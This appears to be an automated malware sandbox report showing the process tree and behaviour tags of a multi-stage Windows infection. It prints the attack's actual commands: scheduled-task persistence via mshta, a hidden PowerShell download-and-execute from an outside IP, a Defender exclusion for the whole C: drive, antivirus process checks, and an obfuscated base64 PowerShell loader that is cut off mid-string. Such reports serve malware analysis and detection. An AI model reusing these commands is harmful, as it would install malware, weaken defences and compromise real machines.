description pid Process procid_target PID 1968 wrote to memory of 1240 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 1968 wrote to memory of 1240 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 1968 wrote to memory of 1240 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 1968 wrote to memory of 1344 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1968 wrote to memory of 1344 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1968 wrote to memory of 1344 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1240 wrote to memory of 932 1240 cmd.exe 88 PID 1240 wrote to memory of 932 1240 cmd.exe 88 PID 1240 wrote to memory of 932 1240 cmd.exe 88 PID 1344 wrote to memory of 5696 1344 mshta.exe 90 PID 1344 wrote to memory of 5696 1344 mshta.exe 90 PID 1344 wrote to memory of 5696 1344 mshta.exe 90 PID 5696 wrote to memory of 2396 5696 powershell.exe 97 PID 5696 wrote to memory of 2396 5696 powershell.exe 97 PID 5696 wrote to memory of 2396 5696 powershell.exe 97 PID 2396 wrote to memory of 6056 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 99 PID 2396 wrote to memory of 6056 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 99 PID 2396 wrote to memory of 6056 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 99 PID 6056 wrote to memory of 5220 6056 rapes.exe 104 PID 6056 wrote to memory of 5220 6056 rapes.exe 104 PID 6056 wrote to memory of 5220 6056 rapes.exe 104 PID 6056 wrote to memory of 3604 6056 rapes.exe 105 PID 6056 wrote to memory of 3604 6056 rapes.exe 105 PID 6056 wrote to memory of 3604 6056 rapes.exe 105 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 3604 wrote to memory of 5248 3604 2f77fa74e4.exe 106 PID 6056 wrote to memory of 1940 6056 rapes.exe 108 PID 6056 wrote to memory of 1940 6056 rapes.exe 108 PID 6056 wrote to memory of 1940 6056 rapes.exe 108 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 1940 wrote to memory of 3040 1940 39c94fe8c8.exe 110 PID 6056 wrote to memory of 2328 6056 rapes.exe 111 PID 6056 wrote to memory of 2328 6056 rapes.exe 111 PID 6056 wrote to memory of 2328 6056 rapes.exe 111 PID 6056 wrote to memory of 2396 6056 rapes.exe 118 PID 6056 wrote to memory of 2396 6056 rapes.exe 118 PID 2396 wrote to memory of 836 2396 VrQSuEQ.exe 119 PID 2396 wrote to memory of 836 2396 VrQSuEQ.exe 119 PID 2396 wrote to memory of 836 2396 VrQSuEQ.exe 119 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 2396 wrote to memory of 6092 2396 VrQSuEQ.exe 121 PID 6056 wrote to memory of 2640 6056 rapes.exe 122 PID 6056 wrote to memory of 2640 6056 rapes.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn lruGUmaTLOZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\dKmy9up1r.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn lruGUmaTLOZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\dKmy9up1r.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:932
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\dKmy9up1r.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5696 -
C:\Users\Admin\AppData\Local\TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE"C:\Users\Admin\AppData\Local\TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6056 -
C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\10478400101\2f77fa74e4.exe"C:\Users\Admin\AppData\Local\Temp\10478400101\2f77fa74e4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10478400101\2f77fa74e4.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478410101\39c94fe8c8.exe"C:\Users\Admin\AppData\Local\Temp\10478410101\39c94fe8c8.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10478410101\39c94fe8c8.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3040
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478420101\mtCxnCB.exe"C:\Users\Admin\AppData\Local\Temp\10478420101\mtCxnCB.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\10478430101\VrQSuEQ.exe"C:\Users\Admin\AppData\Local\Temp\10478430101\VrQSuEQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478440101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10478440101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2640 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:5304 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:5768
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\{28a565e8-f1a5-4ec7-97e4-1a433f73389b}\49993f1a.exe"C:\Users\Admin\AppData\Local\Temp\{28a565e8-f1a5-4ec7-97e4-1a433f73389b}\49993f1a.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:10940 -
C:\Users\Admin\AppData\Local\Temp\{4c367bc6-a84b-4109-94ac-b23a8e6196d9}\de52ffae.exeC:/Users/Admin/AppData/Local/Temp/{4c367bc6-a84b-4109-94ac-b23a8e6196d9}/\de52ffae.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:6632
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478450101\RYZusWg.exe"C:\Users\Admin\AppData\Local\Temp\10478450101\RYZusWg.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\10478460101\n0hEgR9.exe"C:\Users\Admin\AppData\Local\Temp\10478460101\n0hEgR9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:10596
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478470101\LJl8AAr.exe"C:\Users\Admin\AppData\Local\Temp\10478470101\LJl8AAr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:11376
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478480101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10478480101\larBxd7.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:11896 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat7⤵
- System Location Discovery: System Language Discovery
PID:12136 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7160
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:7164
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7696
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:7712
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6899128⤵
- System Location Discovery: System Language Discovery
PID:7856
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Exclusion.psd8⤵
- System Location Discovery: System Language Discovery
PID:3960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "users" Findarticles8⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com8⤵
- System Location Discovery: System Language Discovery
PID:3672
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b8⤵
- System Location Discovery: System Language Discovery
PID:6372
-
-
C:\Users\Admin\AppData\Local\Temp\689912\Jordan.comJordan.com b8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4904
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:6760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478490101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10478490101\qhjMWht.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:10712
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478501121\5uMVCoG.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:10808
-
-
C:\Users\Admin\AppData\Local\Temp\10478510101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10478510101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:13216 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:7080 -
C:\Users\Admin\AppData\Local\Temp\10053300101\cae1c578a6.exe"C:\Users\Admin\AppData\Local\Temp\10053300101\cae1c578a6.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10053300101\cae1c578a6.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:12472
-
-
-
C:\Users\Admin\AppData\Local\Temp\10053310101\bd439de25d.exe"C:\Users\Admin\AppData\Local\Temp\10053310101\bd439de25d.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10053310101\bd439de25d.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10478520101\83a08d4257.exe"C:\Users\Admin\AppData\Local\Temp\10478520101\83a08d4257.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5272
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478531121\ccosvAs.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:12852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10478531121\ccosvAs.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4